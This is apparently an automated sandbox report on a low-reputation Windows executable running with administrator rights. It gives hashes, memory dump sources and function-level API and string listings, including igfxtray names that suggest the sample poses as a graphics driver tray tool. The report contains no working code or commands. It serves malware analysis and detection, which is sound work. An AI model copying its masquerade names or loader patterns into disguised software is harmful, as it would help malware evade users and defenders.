MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:30:00
Start date:	01/10/2024
Path:	C:\Program Files (x86)\lXAMaI\lXAMaI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\lXAMaI\lXAMaI.exe"
Imagebase:	0x430000
File size:	54'152 bytes
MD5 hash:	7B6586E21FBC8F2F0BB784A1A8FC65B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.6%
Total number of Nodes:	1525
Total number of Limit Nodes:	10

Executed Functions

Function 0040B685 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0040B992
@, xrefs: 0040B75C

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 060b66c79f1ebc07483aa769f061d35751916a8a68d592a18d225a526c3f26a5
Instruction ID: 3225901820bd5e81c16140f670548466a5745bc71cfd8ef924f165be478cec6d
Opcode Fuzzy Hash: 060b66c79f1ebc07483aa769f061d35751916a8a68d592a18d225a526c3f26a5
Instruction Fuzzy Hash: 8B32C936219B84C6CBA0CB19E49076AB7A0F7C8B94F105526EB8E97B68DF3CC455CF44

Function 0040BE02 Relevance: 1.6, APIs: 1, Instructions: 54
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 0040BDD2

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 47a40953c1f13fa46decb5413d634fbaa7a3054b2d1dcf9bb5346599d84d7c81
Instruction ID: b91c449a284d6e9abbc8a1a30189cb5d248ef65965c2576a17dc602298d27175
Opcode Fuzzy Hash: 47a40953c1f13fa46decb5413d634fbaa7a3054b2d1dcf9bb5346599d84d7c81
Instruction Fuzzy Hash: 1D216472608BC9C6CBA0CB0AE4947AAB3A1F7C8745F404026EACE97B58DF3DD455CB44

Non-executed Functions

Function 00406A9C Relevance: 73.8, APIs: 39, Strings: 3, Instructions: 329
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcA.USER32 ref: 00406B21
SetTimer.USER32 ref: 00406B73

Strings

, xrefs: 00406E78
(, xrefs: 00406BB5
Progman, xrefs: 00406C1F

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: ProcTimerWindow
String ID: $($Progman
API String ID: 2999710932-2717381911
Opcode ID: 466939cf28e751a212fc29c4aab9ffd331d224cf3533052adedf9187ae4474eb
Instruction ID: 9ce3ef023fafbcca7bb55dd8a001c83d50f19f0a1e7b5a260101691249fde43f
Opcode Fuzzy Hash: 466939cf28e751a212fc29c4aab9ffd331d224cf3533052adedf9187ae4474eb
Instruction Fuzzy Hash: E9E12CB6214B408ADB10DF26E45475A7BA5F78CB94F164126EF8E83B68DF3CC495CB08

Function 004037D4 Relevance: 65.4, APIs: 32, Strings: 5, Instructions: 659stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004023F0: CharNextA.USER32 ref: 00402416
Part of subcall function 004023F0: CharNextA.USER32 ref: 00402436
Part of subcall function 004023F0: CharNextA.USER32 ref: 0040244C
Part of subcall function 004023F0: CharNextA.USER32 ref: 0040245F
Part of subcall function 004023F0: CharNextA.USER32 ref: 0040246E
Part of subcall function 004023F0: CharNextA.USER32 ref: 004024B7

lstrcmpiA.KERNEL32 ref: 0040385B
lstrcmpiA.KERNEL32 ref: 00403875
CharNextA.USER32 ref: 004038BA
lstrcmpiA.KERNEL32 ref: 004038E5
lstrlenA.KERNEL32 ref: 00403F5D

Strings

Delete, xrefs: 00403851
LocalServer32, xrefs: 00403BB8
NoRemove, xrefs: 0040395D
ForceRemove, xrefs: 0040386B
Val, xrefs: 0040398E

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: CharNext$lstrcmpi$lstrlen
String ID: Delete$ForceRemove$LocalServer32$NoRemove$Val
API String ID: 421489534-1664468802
Opcode ID: 252a44df04e26c182ac73757db7d553bce416cf332fde9e664a1632cc8da16c8
Instruction ID: f9f4ed4b6fbf67414008df33c93a0a4dd1b1c77865237d36813866faea27c08b
Opcode Fuzzy Hash: 252a44df04e26c182ac73757db7d553bce416cf332fde9e664a1632cc8da16c8
Instruction Fuzzy Hash: B7426472300B918ADB14DF26D95439A2B64F784BC9F054137EF49ABB99DF3CCA858348

Function 004060E0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 242
registrysynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 00406104
CoInitialize.OLE32 ref: 0040610F
GetCurrentThreadId.KERNEL32 ref: 00406189
CreateEventA.KERNEL32 ref: 004061EF
GetLastError.KERNEL32 ref: 004061F8
CreateMutexA.KERNEL32 ref: 00406289
GetLastError.KERNEL32 ref: 00406292
RegisterClassA.USER32 ref: 004063A8

Part of subcall function 004056F4: GetModuleFileNameA.KERNEL32 ref: 00405777
Part of subcall function 004056F4: CoTaskMemFree.OLE32 ref: 00405799
Part of subcall function 004056F4: CoTaskMemFree.OLE32 ref: 004057A2

CoUninitialize.OLE32 ref: 00406308

Strings

igfxtrayClass, xrefs: 00406381, 0040640E
UnregServer, xrefs: 0040619A
igfxtraymutext, xrefs: 00406212, 0040623B
Global\IGFXTRAY, xrefs: 004061E1
RegServer, xrefs: 004061B2
igfxtrayWindow, xrefs: 004063AE, 004063D7

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: CreateErrorFreeLastTask$ClassCommandCurrentEventFileInitializeLineModuleMutexNameRegisterThreadUninitialize
String ID: Global\IGFXTRAY$RegServer$UnregServer$igfxtrayClass$igfxtrayWindow$igfxtraymutext
API String ID: 1368108152-2274641069
Opcode ID: 6a78eac34d6ea35623c05a23beaeab254c8477e017cdd3060554be796c159202
Instruction ID: 774da480364de0a9ae035e361c9f7d7b3152fc35b8886ccdfa291c6f41b28476
Opcode Fuzzy Hash: 6a78eac34d6ea35623c05a23beaeab254c8477e017cdd3060554be796c159202
Instruction Fuzzy Hash: D2A1CFB120464186EB20DF26F9543AA7361F785B84F86002ADF4B27BA5DF3CC495C74D

Function 0040305C Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 412
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040A5D0: HeapAlloc.KERNEL32(?,?,?,?,0040906C), ref: 0040A604
Part of subcall function 0040A5D0: HeapAlloc.KERNEL32(?,?,?,?,0040906C), ref: 0040A633

Part of subcall function 004023F0: CharNextA.USER32 ref: 00402416
Part of subcall function 004023F0: CharNextA.USER32 ref: 00402436
Part of subcall function 004023F0: CharNextA.USER32 ref: 0040244C
Part of subcall function 004023F0: CharNextA.USER32 ref: 0040245F
Part of subcall function 004023F0: CharNextA.USER32 ref: 0040246E
Part of subcall function 004023F0: CharNextA.USER32 ref: 004024B7

Part of subcall function 004022A0: lstrcmpiA.KERNEL32 ref: 0040231B

VarUI4FromStr.OLEAUT32 ref: 00403211
RegSetValueExA.ADVAPI32 ref: 0040338F
lstrlenA.KERNEL32 ref: 004033AF
lstrlenW.KERNEL32 ref: 004033FE
WideCharToMultiByte.KERNEL32 ref: 00403481
CharPrevA.USER32 ref: 004034CE
lstrcpynA.KERNEL32 ref: 004034E8
lstrcatA.KERNEL32 ref: 004034F8
lstrcatA.KERNEL32 ref: 00403504
lstrcatA.KERNEL32 ref: 00403514
lstrlenA.KERNEL32 ref: 0040351D
lstrcatA.KERNEL32 ref: 0040352C
lstrlenA.KERNEL32 ref: 00403564
RegSetValueExA.ADVAPI32 ref: 00403589

Strings

Module, xrefs: 004033E0

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Char$Next$lstrcatlstrlen$AllocHeapValue$ByteFromMultiPrevWidelstrcmpilstrcpyn
String ID: Module
API String ID: 4087732439-193471262
Opcode ID: 69f89fbbe102d386956620f38fe2d697a0c4d37a5ec27f7ea8701e49d7829bd0
Instruction ID: 506c846d2ade0555d615703addd899040b1641ba0145b283b5d582c0a4915eac
Opcode Fuzzy Hash: 69f89fbbe102d386956620f38fe2d697a0c4d37a5ec27f7ea8701e49d7829bd0
Instruction Fuzzy Hash: 1EE1787230564091EB14EF26981036E2B58B788BDAF49453BEE4A6B7D5DF3CC646C30E

Function 004056F4 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 311
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040A5D0: HeapAlloc.KERNEL32(?,?,?,?,0040906C), ref: 0040A604
Part of subcall function 0040A5D0: HeapAlloc.KERNEL32(?,?,?,?,0040906C), ref: 0040A633

GetModuleFileNameA.KERNEL32 ref: 00405777
CoTaskMemFree.OLE32 ref: 00405799
CoTaskMemFree.OLE32 ref: 004057A2
GetLastError.KERNEL32 ref: 004057D8
CoTaskMemFree.OLE32 ref: 00405805
CoTaskMemFree.OLE32 ref: 0040580E
lstrlenA.KERNEL32 ref: 00405842
MultiByteToWideChar.KERNEL32 ref: 004058C6
CoTaskMemFree.OLE32 ref: 004058EF
CoTaskMemFree.OLE32 ref: 004058F8
CoTaskMemFree.OLE32 ref: 004059AD
CoTaskMemFree.OLE32 ref: 004059B6
CoTaskMemFree.OLE32 ref: 00405A4D
CoTaskMemFree.OLE32 ref: 00405A56
CoTaskMemFree.OLE32 ref: 00405AEC
CoTaskMemFree.OLE32 ref: 00405AF5

Part of subcall function 004020F0: lstrlenW.KERNEL32 ref: 00402124
Part of subcall function 004020F0: lstrlenW.KERNEL32 ref: 00402131
Part of subcall function 004020F0: CoTaskMemAlloc.OLE32 ref: 0040213E
Part of subcall function 004020F0: CoTaskMemAlloc.OLE32 ref: 0040214B
Part of subcall function 004020F0: CoTaskMemFree.OLE32 ref: 004021AB
Part of subcall function 004020F0: CoTaskMemFree.OLE32 ref: 004021B5

Strings

Module, xrefs: 00405980
REGISTRY, xrefs: 00405AA2, 00405ABD

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Task$Free$Alloc$lstrlen$Heap$ByteCharErrorFileLastModuleMultiNameWide
String ID: Module$REGISTRY
API String ID: 2828156328-2506633518
Opcode ID: fce45c2456eb69e56e2257faf6fd19f6bbfb2ea3c4ab7b290617c32b2850e621
Instruction ID: ca4c26b97a0efac8290abe1578ec93de26c2aad21734a06c13b45e5e95690a26
Opcode Fuzzy Hash: fce45c2456eb69e56e2257faf6fd19f6bbfb2ea3c4ab7b290617c32b2850e621
Instruction Fuzzy Hash: 0EC19C76600A809ADB10EF26D9403AB2360F744BD8F168536EF4A6B794DF3CC995CB49

Function 00407B00 Relevance: 30.4, APIs: 20, Instructions: 369
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIMAGE.HCCUTILS(?,?,?,?,?,?,?,?,?,?,?,?,000018E0,00000000,00000000,00000000), ref: 00407B6D

Part of subcall function 004019D0: SysFreeString.OLEAUT32 ref: 00401A0A

SysStringByteLen.OLEAUT32 ref: 00407B98
SysAllocStringByteLen.OLEAUT32 ref: 00407BA3
LoadIMAGE.HCCUTILS(?,?,?,?,?,?,?,?,?,?,?,?,000018E0,00000000,00000000,00000000), ref: 00407C6E
SysFreeString.OLEAUT32 ref: 00407CD2
SysFreeString.OLEAUT32 ref: 00407D27
SysStringByteLen.OLEAUT32 ref: 00407D69
SysAllocStringByteLen.OLEAUT32 ref: 00407D74
LoadIMAGE.HCCUTILS(?,?,?,?,?,?,?,?,?,?,?,?,000018E0,00000000,00000000,00000000), ref: 00407DD3
SysFreeString.OLEAUT32 ref: 00407E31
SysFreeString.OLEAUT32 ref: 00407E80
SysStringByteLen.OLEAUT32 ref: 00407EBF
SysAllocStringByteLen.OLEAUT32 ref: 00407ECA
LoadIMAGE.HCCUTILS(?,?,?,?,?,?,?,?,?,?,?,?,000018E0,00000000,00000000,00000000), ref: 00407F3D
SysStringByteLen.OLEAUT32 ref: 00407F6B
SysAllocStringByteLen.OLEAUT32 ref: 00407F76
LoadIMAGE.HCCUTILS(?,?,?,?,?,?,?,?,?,?,?,?,000018E0,00000000,00000000,00000000), ref: 00407FDA
SysStringByteLen.OLEAUT32 ref: 00408008
SysAllocStringByteLen.OLEAUT32 ref: 00408013
SysFreeString.OLEAUT32 ref: 00408097

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: String$Byte$Free$AllocLoad
String ID:
API String ID: 3317667777-0
Opcode ID: 183c5cd24e751d929d832f9bf0e8194c971ea4d61ec8e267b7d02d13ab102703
Instruction ID: 4e4f18c2868e4720bb753873847e87f8eafa2ad0fc85e532ea3a4a895a8c2930
Opcode Fuzzy Hash: 183c5cd24e751d929d832f9bf0e8194c971ea4d61ec8e267b7d02d13ab102703
Instruction Fuzzy Hash: C0E1B122305B8085DF20DF62D8503AA63A0FB84B98F08453BAF9E67B98DF3CD945C745

Function 004041F0 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 286
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32 ref: 00404261
GetLastError.KERNEL32 ref: 00404280

Strings

.tlb, xrefs: 00404489

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: .tlb
API String ID: 2776309574-1487266626
Opcode ID: ea40857a1c084c813421c705d1ab51973dcd68961761cabe4e68a7119926aca1
Instruction ID: 1f8cc6cf654bbd3e0df553118ffd3835ba4e87f6e787c09a1f99741a91bd2d75
Opcode Fuzzy Hash: ea40857a1c084c813421c705d1ab51973dcd68961761cabe4e68a7119926aca1
Instruction Fuzzy Hash: BDA1E4B230574092DB24DF259A403A96361B7C4BE8F490636DF5A67BD5EF3CC94AC30A

Function 00405130 Relevance: 24.2, APIs: 16, Instructions: 199
librarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32 ref: 00405180
WideCharToMultiByte.KERNEL32 ref: 00405203
LoadLibraryExA.KERNEL32 ref: 00405240
GetLastError.KERNEL32 ref: 0040524E
GetLastError.KERNEL32 ref: 00405258
GetLastError.KERNEL32 ref: 00405265
FindResourceA.KERNEL32 ref: 00405282
GetLastError.KERNEL32 ref: 00405290
GetLastError.KERNEL32 ref: 0040529A
GetLastError.KERNEL32 ref: 004052A7
LoadResource.KERNEL32 ref: 004052C1
GetLastError.KERNEL32 ref: 004052CF
GetLastError.KERNEL32 ref: 004052D9
FreeLibrary.KERNEL32 ref: 004053A7

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: ErrorLast$LibraryLoadResource$ByteCharFindFreeMultiWidelstrlen
String ID:
API String ID: 2848665798-0
Opcode ID: 37f43a37461fe828da21a1cdca9bab02c1cf4671191e0ab1ad383a0fed4afb33
Instruction ID: 9d39d0f5052a14abafa8465a263d30ceaf829427b2f7f2f7563aa985bfd73241
Opcode Fuzzy Hash: 37f43a37461fe828da21a1cdca9bab02c1cf4671191e0ab1ad383a0fed4afb33
Instruction Fuzzy Hash: BE614D76305F4085DB10AB22A9003AB6361FB85BE8F19463ADE1A6B7C4DF7CC485DB0D

Function 00410C70 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 103memorylibraryloaderCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00410CD4
GetSystemInfo.KERNEL32 ref: 00410CEB
GetModuleHandleA.KERNEL32 ref: 00410D08
GetProcAddress.KERNEL32 ref: 00410D1D
VirtualAlloc.KERNEL32 ref: 00410DA7
VirtualProtect.KERNEL32 ref: 00410DBF

Strings

kernel32.dll, xrefs: 00410D01
SetThreadStackGuarantee, xrefs: 00410D13

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
String ID: SetThreadStackGuarantee$kernel32.dll
API String ID: 3290314748-423161677
Opcode ID: b67b2458982da10e4ba334c0591b3bde2ab36802053c9416cead792438fa14fc
Instruction ID: 2f231886fc5577f324ac910ee4dbb9ff4112ee6168b22c1fcfbf434b6293dce5
Opcode Fuzzy Hash: b67b2458982da10e4ba334c0591b3bde2ab36802053c9416cead792438fa14fc
Instruction Fuzzy Hash: D24128B6301B819ADB20DF21E9403D933A5F748B88F84841ADA4D8BB58DF7CD6C9C744

Function 004045D8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0040462B
GetProcAddress.KERNEL32 ref: 00404643
FreeLibrary.KERNEL32 ref: 0040466E
SysFreeString.OLEAUT32 ref: 0040469B

Strings

UnRegisterTypeLib, xrefs: 00404639
oleaut32.dll, xrefs: 00404624

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: FreeLibrary$AddressLoadProcString
String ID: UnRegisterTypeLib$oleaut32.dll
API String ID: 3344498334-4171951838
Opcode ID: e60604223f3828382bf9c0c9768c69a528c32cd41ff5371d9b4bb924de844cf8
Instruction ID: b658ee25eb4824eafc576d1b324e19272523de479c89de057fb39a4939ac59fb
Opcode Fuzzy Hash: e60604223f3828382bf9c0c9768c69a528c32cd41ff5371d9b4bb924de844cf8
Instruction Fuzzy Hash: 472149B6201B0582DA00DB29E85435967A0FBC8FA4F250222DF5E477B4EF3CC886CB14

Function 00408550 Relevance: 10.6, APIs: 7, Instructions: 55COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00408570
RtlLookupFunctionEntry.KERNEL32 ref: 00408588
RtlVirtualUnwind.KERNEL32 ref: 004085C2
SetUnhandledExceptionFilter.KERNEL32 ref: 00408629
UnhandledExceptionFilter.KERNEL32 ref: 00408636
GetCurrentProcess.KERNEL32 ref: 0040863C
TerminateProcess.KERNEL32 ref: 0040864A

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
String ID:
API String ID: 3266983031-0
Opcode ID: 335f3d40d633a96ea1ad17d848c53eeab3f4c73e59dd902e026eb8155d3c1596
Instruction ID: 4bbbc007609b574f34c8421ef5b91e2856ca58d215099fda4fb1b818256ccfa1
Opcode Fuzzy Hash: 335f3d40d633a96ea1ad17d848c53eeab3f4c73e59dd902e026eb8155d3c1596
Instruction Fuzzy Hash: 9B31C5B9214B40E6EA108F16F844389B7A4F788B84F95011ADF8D53B69DF7CC596CB08

Function 0040EF30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 125fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,0041163E), ref: 0040EFF3
GetStdHandle.KERNEL32(?,?,?,0041163E), ref: 0040F103
WriteFile.KERNEL32(?,?,?,0041163E), ref: 0040F13E

Strings

..., xrefs: 0040F069
Microsoft Visual C++ Runtime Library, xrefs: 0040F0D0

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$Microsoft Visual C++ Runtime Library
API String ID: 3784150691-1400160072
Opcode ID: 03d73b2836f25d6a76143d8eb9918764c17ad11581661f0acb8d485a7977688b
Instruction ID: 7f1d251cf964fea441f3eff66ab91b128d9e4ec0557172fa4239233af98977e7
Opcode Fuzzy Hash: 03d73b2836f25d6a76143d8eb9918764c17ad11581661f0acb8d485a7977688b
Instruction Fuzzy Hash: 0E517E76204B808AD724CF6AE8403AA7770F7497A0F544226EBBD93BE5DB3CD555C308

Function 00408490 Relevance: 7.5, APIs: 5, Instructions: 40timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 004084D2
GetCurrentProcessId.KERNEL32 ref: 004084DD
GetCurrentThreadId.KERNEL32 ref: 004084E9
GetTickCount.KERNEL32 ref: 004084F5
QueryPerformanceCounter.KERNEL32 ref: 00408506

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 9b85f187aa9b8ec1d85776caf1edb607893c101d01d15dd9197baf87370f4c84
Instruction ID: dfcee6b6f36967103b734904c6e450f5c0c2092cd18f78f0f176c04c5d2e36c3
Opcode Fuzzy Hash: 9b85f187aa9b8ec1d85776caf1edb607893c101d01d15dd9197baf87370f4c84
Instruction Fuzzy Hash: 06016DB5611B4092EA409F15F940386B3A5FB4ABD5F892225DF8E437A4DB3CC894C704

Function 00411990 Relevance: 6.2, APIs: 4, Instructions: 151fileCOMMON

Download Yara Rule

APIs

